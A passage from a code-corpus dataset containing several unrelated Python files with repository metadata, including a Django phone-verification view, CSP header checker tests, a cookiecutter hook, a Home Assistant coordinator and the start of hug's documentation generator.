return Response(data=json.dumps({
'code': 400,
'message': str(
_(
'Person aged over 50 can verify your account during 90 days after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 2. 60세 이상 15일
if now().date() - datetime.strptime(log.date_of_birth, '%Y%m%d').date() \
> timedelta(days=365 * 60) \
and now() - profile.user.date_joined < timedelta(days=15):
return Response(data=json.dumps({
'code': 400,
'message': str(
_('Person aged over 60 can verify your account during 15 days after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 3. 50세 이상 남자 72시간
if now().date() - datetime.strptime(log.date_of_birth, '%Y%m%d').date() \
> timedelta(days=365 * 50) \
and log.gender == 1 \
and now() - profile.user.date_joined < timedelta(hours=72):
return Response(data=json.dumps({
'code': 400,
'message': str(
_('Person aged over 50 can verify your account during 72 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 4. 45세 이상 여자 72시간
if now().date() - datetime.strptime(log.date_of_birth, '%Y%m%d').date() \
> timedelta(days=365 * 45) \
and log.gender == 0 \
and now() - profile.user.date_joined < timedelta(hours=72):
return Response(data=json.dumps({
'code': 400,
'message': str(
_(
'Person aged over 45 can verify your account during 72 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 5. 여자 알뜰폰 72시간
if 'MVNO' in log.telecom and log.gender == 0 \
and now() - profile.user.date_joined < timedelta(hours=72):
return Response(data=json.dumps({
'code': 400,
'message': str(
_('MVNO user can verify your account during 72 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 6. 45세 이상 남자 알뜰폰 48시간
if 'MVNO' in log.telecom and log.gender == 1 \
and now().date() - datetime.strptime(log.date_of_birth, '%Y%m%d').date() \
> timedelta(days=365 * 45) \
and now() - profile.user.date_joined < timedelta(hours=48):
return Response(data=json.dumps({
'code': 400,
'message': str(
_('MVNO user can verify your account during 48 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 7. 40세 이상 알뜰폰 24시간
if 'MVNO' in log.telecom \
and now().date() - datetime.strptime(log.date_of_birth, '%Y%m%d').date() \
> timedelta(days=365 * 40) \
and now() - profile.user.date_joined < timedelta(hours=24):
return Response(data=json.dumps({
'code': 400,
'message': str(_('MVNO user can verify your account during 24 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 8. 알뜰폰 영업시간 8시간
if 'MVNO' in log.telecom \
and now() - profile.user.date_joined < timedelta(hours=8) \
and datetime.strptime('08:00', '%H:%M').time() < localtime().time() \
< datetime.strptime('19:00', '%H:%M').time():
return Response(data=json.dumps({
'code': 400,
'message': str(
_('MVNO user can verify your account during 8 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 9. 여자 영업시간 8시간
if log.gender == 0 \
and now() - profile.user.date_joined < timedelta(hours=8) \
and datetime.strptime('08:00', '%H:%M').time() < localtime().time() \
< datetime.strptime('19:00', '%H:%M').time():
return Response(data=json.dumps({
'code': 400,
'message': str(
_(
'You can verify your account during 8 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
if not banned:
profile.phone = log.cellphone
if log.fullname == profile.full_name:
profile.phone_verified_status = Profile.PHONE_VERIFIED_STATUS_CHOICES.verified
profile.date_of_birth = datetime.strptime(log.date_of_birth, '%Y%m%d').date()
profile.gender = log.gender
profile.domestic = log.domestic
profile.telecom = log.telecom
profile.save()
orders = Order.objects.valid(profile.user).filter(status__in=[
Order.STATUS_CHOICES.under_review,
])
if orders:
message = _('Phone Verification {}').format(profile.full_name)
send_notification_line.delay(message)
return Response(serializer.data, status=status.HTTP_200_OK)
else:
return Response(data=json.dumps({
'code': 400,
'message': str(_('Your name does not match the phone owner.'))
}),
status=status.HTTP_400_BAD_REQUEST)
else:
return Response(data=json.dumps({
'code': 400,
'message': str(_('Your phone number is banned.'))
}),
status=status.HTTP_400_BAD_REQUEST)
else:
return Response(data=json.dumps({
'code': 400,
'message': str(_('You have verified within 48 hours.'))
}),
status=status.HTTP_400_BAD_REQUEST)
except (Profile.DoesNotExist, PhoneVerificationLog.DoesNotExist):
return Response(data=json.dumps({
'code': 400,
'message': str(_('Illegal access: no record'))
}),
status=status.HTTP_400_BAD_REQUEST)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
| 20,900 | 4,681 | 552 |
6702ad0203698101aea2205d1430ecdc7231ca29 | 1,011 | py | Python | TestPython/win32_test.py | ppcrong/TestPython | 6a87d09e31ad662ce1dea707118d1e914dfeaba7 | [
"Apache-2.0"
] | null | null | null | TestPython/win32_test.py | ppcrong/TestPython | 6a87d09e31ad662ce1dea707118d1e914dfeaba7 | [
"Apache-2.0"
] | null | null | null | TestPython/win32_test.py | ppcrong/TestPython | 6a87d09e31ad662ce1dea707118d1e914dfeaba7 | [
"Apache-2.0"
] | null | null | null | """
ref: https://blog.csdn.net/chengqiuming/article/details/78601000
"""
import win32gui
from win32con import *
wc = win32gui.WNDCLASS()
wc.hbrBackground = COLOR_BTNFACE + 1
wc.hCursor = win32gui.LoadCursor(0, IDI_APPLICATION)
wc.lpszClassName = "Python no Windows"
wc.lpfnWndProc = WndProc
reg = win32gui.RegisterClass(wc)
hwnd = win32gui.CreateWindow(reg, 'Python', WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT,
CW_USEDEFAULT, 0, 0, 0, None)
win32gui.ShowWindow(hwnd, SW_SHOWNORMAL)
win32gui.UpdateWindow(hwnd)
win32gui.PumpMessages()
| 33.7 | 109 | 0.714144 | """
ref: https://blog.csdn.net/chengqiuming/article/details/78601000
"""
import win32gui
from win32con import *
def WndProc(hwnd, msg, wParam, lParam):
    """Window procedure: paints the centered caption and posts quit on destroy."""
    if msg == WM_PAINT:
        caption = 'GUI Python'
        dc, paint_info = win32gui.BeginPaint(hwnd)
        client_rect = win32gui.GetClientRect(hwnd)
        win32gui.DrawText(dc, caption, len(caption), client_rect, DT_SINGLELINE | DT_CENTER | DT_VCENTER)
        win32gui.EndPaint(hwnd, paint_info)
    elif msg == WM_DESTROY:
        win32gui.PostQuitMessage(0)
    return win32gui.DefWindowProc(hwnd, msg, wParam, lParam)
# Describe the window class: background brush, default cursor, class name,
# and the WndProc callback defined above.
wc = win32gui.WNDCLASS()
wc.hbrBackground = COLOR_BTNFACE + 1
wc.hCursor = win32gui.LoadCursor(0, IDI_APPLICATION)
wc.lpszClassName = "Python no Windows"
wc.lpfnWndProc = WndProc
# Register the class, create a top-level overlapped window from it,
# show it, and run the message loop until WM_QUIT.
reg = win32gui.RegisterClass(wc)
hwnd = win32gui.CreateWindow(reg, 'Python', WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT,
                             CW_USEDEFAULT, 0, 0, 0, None)
win32gui.ShowWindow(hwnd, SW_SHOWNORMAL)
win32gui.UpdateWindow(hwnd)
win32gui.PumpMessages()
| 399 | 0 | 23 |
4033af3baa2cce496ab17f96798632a32ab16573 | 1,842 | py | Python | resources/code/train/Python/unix_completers.py | searene/PLDetector | a8052b1d2ba91bfcc3fd4a5252480cf511d8a210 | [
"MIT"
] | 1 | 2020-11-09T08:24:17.000Z | 2020-11-09T08:24:17.000Z | resources/code/train/Python/unix_completers.py | searene/PLDetector | a8052b1d2ba91bfcc3fd4a5252480cf511d8a210 | [
"MIT"
] | null | null | null | resources/code/train/Python/unix_completers.py | searene/PLDetector | a8052b1d2ba91bfcc3fd4a5252480cf511d8a210 | [
"MIT"
] | null | null | null | # This file is part of the Hotwire Shell project API.
# Copyright (C) 2007 Colin Walters <walters@verbum.org>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE X CONSORTIUM BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
# THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os,sys
from hotwire.completion import Completer, Completion
from hotwire.builtins.sys_builtin import SystemCompleters
from hotwire.externals.singletonmixin import Singleton
#SystemCompleters.getInstance()['rpm'] = rpm_completion | 43.857143 | 86 | 0.741585 | # This file is part of the Hotwire Shell project API.
# Copyright (C) 2007 Colin Walters <walters@verbum.org>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE X CONSORTIUM BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
# THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os,sys
from hotwire.completion import Completer, Completion
from hotwire.builtins.sys_builtin import SystemCompleters
from hotwire.externals.singletonmixin import Singleton
class RpmDbCompleter(Completer):
    """Completer backed by a (stubbed) list of installed RPM package names."""
    def __init__(self):
        super(RpmDbCompleter, self).__init__()
        # Hard-coded stand-in for a real RPM database query.
        self.__db = ['foo', 'bar-devel', 'crack-attack']

    def completions(self, text, cwd):
        """Yield each package-name completion matching *text*."""
        for package_name in self.__db:
            candidate = self._match(package_name, text)
            if candidate:
                yield candidate
def rpm_completion(context, args, i):
    """Return an RpmDbCompleter when completing an rpm query (-q...) argument, else None."""
    current_arg = args[i].text
    return RpmDbCompleter() if current_arg.startswith('-q') else None
#SystemCompleters.getInstance()['rpm'] = rpm_completion | 329 | 11 | 107 |
7b4db5c13a68afc8004647b967a4e4ecd74c7f3b | 1,688 | py | Python | securityheaders/checkers/csp/test_deprecateddirective.py | th3cyb3rc0p/securityheaders | 941264be581dc01afe28f6416f2d7bed79aecfb3 | [
"Apache-2.0"
] | 151 | 2018-07-29T22:34:43.000Z | 2022-03-22T05:08:27.000Z | securityheaders/checkers/csp/test_deprecateddirective.py | th3cyb3rc0p/securityheaders | 941264be581dc01afe28f6416f2d7bed79aecfb3 | [
"Apache-2.0"
] | 5 | 2019-04-24T07:31:36.000Z | 2021-04-15T14:31:23.000Z | securityheaders/checkers/csp/test_deprecateddirective.py | th3cyb3rc0p/securityheaders | 941264be581dc01afe28f6416f2d7bed79aecfb3 | [
"Apache-2.0"
] | 42 | 2018-07-31T08:18:59.000Z | 2022-03-28T08:18:32.000Z | import unittest
from securityheaders.checkers.csp import CSPDeprecatedDirectiveChecker, CSPReportOnlyDeprecatedDirectiveChecker
if __name__ == '__main__':
unittest.main()
| 33.098039 | 116 | 0.659953 | import unittest
from securityheaders.checkers.csp import CSPDeprecatedDirectiveChecker, CSPReportOnlyDeprecatedDirectiveChecker
class DeprectedDirectiveTest(unittest.TestCase):
    """Checks the deprecated-directive checkers for CSP and CSP-Report-Only headers."""

    def setUp(self):
        self.checker = CSPDeprecatedDirectiveChecker()
        self.report_only_checker = CSPReportOnlyDeprecatedDirectiveChecker()
        # Preserve the original short aliases used by the assertions below.
        self.x = self.checker
        self.y = self.report_only_checker

    def test_checkNoCSP(self):
        headers = {'test': 'value'}
        self.assertEqual(self.x.check(headers), [])

    def test_checkNone(self):
        self.assertEqual(self.x.check(None), [])

    def test_NonePolicy(self):
        headers = {'content-security-policy': None}
        self.assertEqual(self.x.check(headers), [])

    def test_DeprecatedReportUriCSP3(self):
        headers = {'content-security-policy': "report-uri http://foo.bar/csp"}
        findings = self.x.check(headers)
        self.assertIsNotNone(findings)
        self.assertEqual(len(findings), 1)

    def test_RODeprecatedReportUriCSP3(self):
        headers = {'content-security-policy-report-only': "report-uri http://foo.bar/csp"}
        findings = self.y.check(headers)
        self.assertIsNotNone(findings)
        self.assertEqual(len(findings), 1)

    def test_ValidCSP(self):
        headers = {'content-security-policy': "default-src 'self'; script-src 'nonce-4AEemGb0xJptoIGFP3Nd'"}
        self.assertEqual(self.x.check(headers), [])

    def test_ROValidCSP(self):
        headers = {'content-security-policy-report-only': "default-src 'self'; script-src 'nonce-4AEemGb0xJptoIGFP3Nd'"}
        self.assertEqual(self.y.check(headers), [])
if __name__ == '__main__':
unittest.main()
| 1,241 | 27 | 242 |
cb3b77714fd32c8a065680423d9cd22edd9be990 | 1,483 | py | Python | monlan/datamanagement/SymbolDataManager.py | CameleoGrey/Monlan | 998baa99d375ac28de317c431a724bdbc36ba0ff | [
"Apache-2.0"
] | 3 | 2021-12-04T10:05:10.000Z | 2022-03-18T13:25:17.000Z | monlan/datamanagement/SymbolDataManager.py | CameleoGrey/Monlan | 998baa99d375ac28de317c431a724bdbc36ba0ff | [
"Apache-2.0"
] | null | null | null | monlan/datamanagement/SymbolDataManager.py | CameleoGrey/Monlan | 998baa99d375ac28de317c431a724bdbc36ba0ff | [
"Apache-2.0"
] | 1 | 2021-04-28T18:18:25.000Z | 2021-04-28T18:18:25.000Z |
import pandas as pd
from datetime import datetime
from dateutil import parser
| 35.309524 | 96 | 0.609575 |
import pandas as pd
from datetime import datetime
from dateutil import parser
class SymbolDataManager:
    """Loads raw per-symbol/timeframe CSV exports into pandas DataFrames.

    Files are expected at ``<rawDataDir>/<symbol>_<timeFrame>.csv``,
    tab-separated, with MetaTrader-style angle-bracketed headers
    (``<DATE>``, ``<TIME>``, ``<OPEN>``, ...).
    """

    def __init__(self, rawDataDir=None):
        """Remember the raw-data directory, defaulting to the project layout."""
        if rawDataDir is None:
            self.rawDataDir = "../data/raw/"
        else:
            self.rawDataDir = rawDataDir

    def getData(self, symbol, timeFrame, normalizeNames = False, normalizeDateTime = False):
        """Read the CSV for ``symbol``/``timeFrame``; optionally normalize columns.

        normalizeNames: lower-case headers and strip '<'/'>' markers.
        normalizeDateTime: merge 'date'+'time' into a leading 'datetime' column
        (requires normalized names).
        """
        readedData = pd.read_csv(self.rawDataDir + symbol + "_" + timeFrame + ".csv", sep="\t")
        if normalizeNames: readedData = self.normalizeColumnNames(readedData)
        if normalizeDateTime: readedData = self.normalizeDateTimeColumns(readedData)
        return readedData

    def normalizeColumnNames(self, df):
        """Lower-case all column names and strip the '<'/'>' markers in place."""
        df.columns = [name.lower().replace("<", "").replace(">", "")
                      for name in df.columns]
        return df

    def normalizeDateTimeColumns(self, df):
        """Replace 'date' and 'time' columns with a single leading 'datetime' column."""
        df["datetime"] = pd.to_datetime(df["date"] + " " + df["time"])
        del df["date"]
        del df["time"]
        # The new column was appended last; rotate it to the front while
        # preserving the relative order of every other column.
        columns = list(df.columns)
        df = df[columns[-1:] + columns[:-1]]
        return df
| 1,270 | 3 | 130 |
ff4152be70b620fb20dbfd2a00e10d70abf195e2 | 2,133 | py | Python | hooks/post_gen_project.py | insspb/python3-boilerplate | 7d70cd8a7bbbe2805ae5f4cb538996a30b96c736 | [
"MIT"
] | 3 | 2020-04-22T04:09:18.000Z | 2021-12-20T08:44:44.000Z | hooks/post_gen_project.py | insspb/python3-boilerplate | 7d70cd8a7bbbe2805ae5f4cb538996a30b96c736 | [
"MIT"
] | 11 | 2019-08-31T08:37:40.000Z | 2019-08-31T11:25:29.000Z | hooks/post_gen_project.py | insspb/python3-boilerplate | 7d70cd8a7bbbe2805ae5f4cb538996a30b96c736 | [
"MIT"
] | 1 | 2020-11-24T11:18:50.000Z | 2020-11-24T11:18:50.000Z | #!/usr/bin/env python
import os
import shutil
PROJECT_DIRECTORY = os.path.realpath(os.path.curdir)
if __name__ == '__main__':
if '{{ cookiecutter.authors_format }}' == 'Markdown':
remove_file('AUTHORS.rst')
remove_file('docs/source/AUTHORS.rst')
elif '{{ cookiecutter.authors_format }}' == 'reStructuredText':
remove_file('AUTHORS.md')
remove_file('docs/source/AUTHORS.md')
else:
remove_file('AUTHORS.rst')
remove_file('docs/source/AUTHORS.rst')
remove_file('AUTHORS.md')
remove_file('docs/source/AUTHORS.md')
if '{{ cookiecutter.readme_format }}' == 'Markdown':
remove_file('README.rst')
remove_file('docs/source/README.rst')
elif '{{ cookiecutter.readme_format }}' == 'reStructuredText':
remove_file('README.md')
remove_file('docs/source/README.md')
if '{{ cookiecutter.changelog_format }}' == 'Markdown':
remove_file('CHANGELOG.rst')
remove_file('docs/source/CHANGELOG.rst')
elif '{{ cookiecutter.changelog_format }}' == 'reStructuredText':
remove_file('CHANGELOG.md')
remove_file('docs/source/CHANGELOG.md')
else:
remove_file('CHANGELOG.rst')
remove_file('docs/source/CHANGELOG.rst')
remove_file('CHANGELOG.md')
remove_file('docs/source/CHANGELOG.md')
if '{{ cookiecutter.license }}' == 'None':
remove_file('LICENSE')
remove_file('docs/source/license.rst')
if '{{ cookiecutter.use_sphinx_documentation }}' == 'no':
remove_directory('docs')
if '{{ cookiecutter.install_issues_templates }}' == 'no':
remove_directory('.github')
remove_directory('.gitlab')
elif '{{ cookiecutter.install_issues_templates }}' == 'Gitlab':
remove_directory('.github')
elif '{{ cookiecutter.install_issues_templates }}' == 'Github':
remove_directory('.gitlab')
| 33.857143 | 94 | 0.65354 | #!/usr/bin/env python
import os
import shutil
PROJECT_DIRECTORY = os.path.realpath(os.path.curdir)
def remove_file(filepath):
    """Delete a file, given its path relative to the generated project root."""
    target = os.path.join(PROJECT_DIRECTORY, filepath)
    os.remove(target)
def remove_directory(dirpath):
    """Recursively delete a directory under the generated project root."""
    target = os.path.join(PROJECT_DIRECTORY, dirpath)
    shutil.rmtree(target, ignore_errors=False, onerror=None)
if __name__ == '__main__':
    # Post-generation cleanup: delete the variants of each templated file
    # that do not match the options the user picked in cookiecutter.

    # Keep only the AUTHORS files matching the chosen format (none if neither).
    if '{{ cookiecutter.authors_format }}' == 'Markdown':
        remove_file('AUTHORS.rst')
        remove_file('docs/source/AUTHORS.rst')
    elif '{{ cookiecutter.authors_format }}' == 'reStructuredText':
        remove_file('AUTHORS.md')
        remove_file('docs/source/AUTHORS.md')
    else:
        remove_file('AUTHORS.rst')
        remove_file('docs/source/AUTHORS.rst')
        remove_file('AUTHORS.md')
        remove_file('docs/source/AUTHORS.md')

    # Keep only the README matching the chosen format.
    # NOTE(review): unlike the AUTHORS/CHANGELOG branches there is no final
    # ``else`` removing both variants — confirm whether that is intended.
    if '{{ cookiecutter.readme_format }}' == 'Markdown':
        remove_file('README.rst')
        remove_file('docs/source/README.rst')
    elif '{{ cookiecutter.readme_format }}' == 'reStructuredText':
        remove_file('README.md')
        remove_file('docs/source/README.md')

    # Keep only the CHANGELOG matching the chosen format (none if neither).
    if '{{ cookiecutter.changelog_format }}' == 'Markdown':
        remove_file('CHANGELOG.rst')
        remove_file('docs/source/CHANGELOG.rst')
    elif '{{ cookiecutter.changelog_format }}' == 'reStructuredText':
        remove_file('CHANGELOG.md')
        remove_file('docs/source/CHANGELOG.md')
    else:
        remove_file('CHANGELOG.rst')
        remove_file('docs/source/CHANGELOG.rst')
        remove_file('CHANGELOG.md')
        remove_file('docs/source/CHANGELOG.md')

    # Drop license files when no license was selected.
    if '{{ cookiecutter.license }}' == 'None':
        remove_file('LICENSE')
        remove_file('docs/source/license.rst')

    # Drop the Sphinx docs tree entirely when docs were not requested.
    if '{{ cookiecutter.use_sphinx_documentation }}' == 'no':
        remove_directory('docs')

    # Keep only the issue-template directory for the chosen hosting platform.
    if '{{ cookiecutter.install_issues_templates }}' == 'no':
        remove_directory('.github')
        remove_directory('.gitlab')
    elif '{{ cookiecutter.install_issues_templates }}' == 'Gitlab':
        remove_directory('.github')
    elif '{{ cookiecutter.install_issues_templates }}' == 'Github':
        remove_directory('.gitlab')
| 166 | 0 | 46 |
f86e8dde87c41ff53dc076cdae82faecd78c22b6 | 2,452 | py | Python | custom_components/magicmirror/coordinator.py | sindrebroch/ha-magicmirror-remote | 479d326065d834c695114359bb70b7627c14bf87 | [
"Apache-2.0"
] | 4 | 2021-10-31T00:43:38.000Z | 2022-02-27T19:54:12.000Z | custom_components/magicmirror/coordinator.py | sindrebroch/ha-magicmirror-remote | 479d326065d834c695114359bb70b7627c14bf87 | [
"Apache-2.0"
] | 5 | 2022-02-13T17:50:16.000Z | 2022-03-30T20:55:45.000Z | custom_components/magicmirror/coordinator.py | sindrebroch/ha-magicmirror | 479d326065d834c695114359bb70b7627c14bf87 | [
"Apache-2.0"
] | null | null | null | """The MagicMirror integration."""
from __future__ import annotations
from datetime import timedelta
from aiohttp.client_exceptions import ClientConnectorError
from async_timeout import timeout
from voluptuous.error import Error
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from .api import MagicMirrorApiClient
from .const import DOMAIN as MAGICMIRROR_DOMAIN, LOGGER
from .models import Entity, MonitorResponse, QueryResponse
class MagicMirrorDataUpdateCoordinator(DataUpdateCoordinator):
    """Class to manage fetching MagicMirror data."""

    def __init__(
        self,
        hass: HomeAssistant,
        api: MagicMirrorApiClient,
    ) -> None:
        """Initialize."""

        self.api = api

        # Device-registry entry shown for the MagicMirror in Home Assistant;
        # the configuration URL points at the MMM-Remote-Control page.
        self._attr_device_info = DeviceInfo(
            name="MagicMirror",
            model="MagicMirror",
            manufacturer="MagicMirror",
            identifiers={(MAGICMIRROR_DOMAIN, "MagicMirror")},
            configuration_url=f"{api.base_url}/remote.html",
        )

        # Poll the mirror once per minute.
        super().__init__(
            hass,
            LOGGER,
            name=MAGICMIRROR_DOMAIN,
            update_interval=timedelta(minutes=1),
        )

    async def _async_update_data(self) -> dict[str, str]:
        """Update data via library.

        Fetches monitor status, update availability, and brightness in one
        pass; failures of the whole fetch raise UpdateFailed, individual
        unsuccessful responses are only logged.

        NOTE(review): the annotation says dict[str, str], but the values
        returned are str/bool/int — consider dict[str, Any].
        """

        try:
            # Shared 10-second budget for the three REST calls combined.
            async with timeout(10):
                monitor: MonitorResponse = await self.api.monitor_status()
                update: QueryResponse = await self.api.update_available()
                brightness: QueryResponse = await self.api.get_brightness()

                if not monitor.success:
                    LOGGER.warning("Failed to fetch monitor-status for MagicMirror")
                if not update.success:
                    LOGGER.warning("Failed to fetch update-status for MagicMirror")
                if not brightness.success:
                    LOGGER.warning("Failed to fetch brightness for MagicMirror")

                return {
                    Entity.MONITOR_STATUS.value: monitor.monitor,
                    Entity.UPDATE_AVAILABLE.value: bool(update.result),
                    Entity.BRIGHTNESS.value: int(brightness.result),
                }
        except (Error, ClientConnectorError) as error:
            LOGGER.error("Update error %s", error)
            raise UpdateFailed(error) from error
raise UpdateFailed(error) from error
| 34.535211 | 88 | 0.641109 | """The MagicMirror integration."""
from __future__ import annotations
from datetime import timedelta
from aiohttp.client_exceptions import ClientConnectorError
from async_timeout import timeout
from voluptuous.error import Error
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from .api import MagicMirrorApiClient
from .const import DOMAIN as MAGICMIRROR_DOMAIN, LOGGER
from .models import Entity, MonitorResponse, QueryResponse
class MagicMirrorDataUpdateCoordinator(DataUpdateCoordinator):
"""Class to manage fetching MagicMirror data."""
def __init__(
self,
hass: HomeAssistant,
api: MagicMirrorApiClient,
) -> None:
"""Initialize."""
self.api = api
self._attr_device_info = DeviceInfo(
name="MagicMirror",
model="MagicMirror",
manufacturer="MagicMirror",
identifiers={(MAGICMIRROR_DOMAIN, "MagicMirror")},
configuration_url=f"{api.base_url}/remote.html",
)
super().__init__(
hass,
LOGGER,
name=MAGICMIRROR_DOMAIN,
update_interval=timedelta(minutes=1),
)
async def _async_update_data(self) -> dict[str, str]:
"""Update data via library."""
try:
async with timeout(10):
monitor: MonitorResponse = await self.api.monitor_status()
update: QueryResponse = await self.api.update_available()
brightness: QueryResponse = await self.api.get_brightness()
if not monitor.success:
LOGGER.warning("Failed to fetch monitor-status for MagicMirror")
if not update.success:
LOGGER.warning("Failed to fetch update-status for MagicMirror")
if not brightness.success:
LOGGER.warning("Failed to fetch brightness for MagicMirror")
return {
Entity.MONITOR_STATUS.value: monitor.monitor,
Entity.UPDATE_AVAILABLE.value: bool(update.result),
Entity.BRIGHTNESS.value: int(brightness.result),
}
except (Error, ClientConnectorError) as error:
LOGGER.error("Update error %s", error)
raise UpdateFailed(error) from error
| 0 | 0 | 0 |
799ae99b0615493922bf217db8bdbd66c9dff751 | 1,540 | py | Python | qittle/types/methods/hook.py | muffleo/qittle | 6658e11eae9e6d83bcf0e930803c2f41abd3f4a0 | [
"MIT"
] | 2 | 2020-09-15T19:48:13.000Z | 2020-09-16T10:26:17.000Z | qittle/types/methods/hook.py | cyanlabs-org/qittle | 6658e11eae9e6d83bcf0e930803c2f41abd3f4a0 | [
"MIT"
] | 2 | 2021-05-04T17:15:28.000Z | 2021-05-04T17:20:09.000Z | qittle/types/methods/hook.py | cyanlabs-org/qittle | 6658e11eae9e6d83bcf0e930803c2f41abd3f4a0 | [
"MIT"
] | null | null | null | from qittle.types.responses import hook
from .base import Base
| 27.017544 | 66 | 0.470779 | from qittle.types.responses import hook
from .base import Base
class HookCategory(Base):
    """API methods for managing payment-notification web hooks
    (register / fetch active / delete / send test notification)."""

    async def register(
        self,
        param: str,
        hook_type: int = 1,
        txn_type: str = 2,  # NOTE(review): annotated str but defaults to int 2 — confirm intended type/default
        **kwargs
    ) -> hook.DescriptionModel:
        """Register a new hook via PUT payment-notifier/v1/hooks.

        ``param`` is the hook target — presumably a callback URL, TODO confirm.
        """
        params = self.get_set_params(locals())
        return hook.DescriptionModel(
            **await self.api.request(
                "PUT", "payment-notifier/v1/hooks",
                params
            )
        )

    async def get(
        self,
        **kwargs,
    ) -> hook.DescriptionModel:
        """Fetch the currently active hook via GET payment-notifier/v1/hooks/active."""
        params = self.get_set_params(locals())
        return hook.DescriptionModel(
            **await self.api.request(
                "GET", "payment-notifier/v1/hooks/active",
                params
            )
        )

    async def delete(
        self,
        hook_id: str,
        **kwargs,
    ) -> hook.ResponseModel:
        """Remove the hook identified by ``hook_id`` via DELETE payment-notifier/v1/hooks/{hook_id}."""
        params = self.get_set_params(locals())
        return hook.ResponseModel(
            **await self.api.request(
                "DELETE", f"payment-notifier/v1/hooks/{hook_id}",
                params
            )
        )

    async def trigger(
        self,
        **kwargs,
    ) -> hook.ResponseModel:
        """Ask the service to send a test notification via GET payment-notifier/v1/hooks/test."""
        params = self.get_set_params(locals())
        return hook.ResponseModel(
            **await self.api.request(
                "GET", "payment-notifier/v1/hooks/test",
                params
            )
        )
| 1,330 | 4 | 139 |
d788a229f5971b43b029ba0f7cd215f7e844b9c5 | 4,328 | py | Python | hug/documentation.py | alisaifee/hug | bfd9b56fb5ce2a8c994219fa5941c28bc7f37bab | [
"MIT"
] | null | null | null | hug/documentation.py | alisaifee/hug | bfd9b56fb5ce2a8c994219fa5941c28bc7f37bab | [
"MIT"
] | null | null | null | hug/documentation.py | alisaifee/hug | bfd9b56fb5ce2a8c994219fa5941c28bc7f37bab | [
"MIT"
] | null | null | null | """hug/documentation.py
Defines tools that automate the creation of documentation for an API build using the Hug Framework
Copyright (C) 2015 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from collections import OrderedDict
import hug.types
def generate(module, base_url="", api_version=None):
    '''Generates documentation based on a Hug API module, base_url, and api_version (if applicable)

    Returns an OrderedDict mapping version -> url -> HTTP method -> details
    (usage, examples, outputs, inputs). When only one version exists the
    version level is flattened into the top of the returned dict.
    '''
    documentation = OrderedDict()

    overview = module.__doc__
    if overview:
        documentation['overview'] = overview

    documentation['versions'] = OrderedDict()
    versions = module.__hug__.versions
    for version in (api_version, ) if api_version else versions:
        documentation['versions'][version] = OrderedDict()

    for url, methods in module.__hug__.routes.items():
        # was: ``for method, versions in methods.items()`` — renamed to stop
        # shadowing the module-level ``versions`` collected above.
        for method, method_versions in methods.items():
            for version, handler in method_versions.items():
                # A handler registered under ``None`` applies to every version
                # this method is registered for; otherwise only its own.
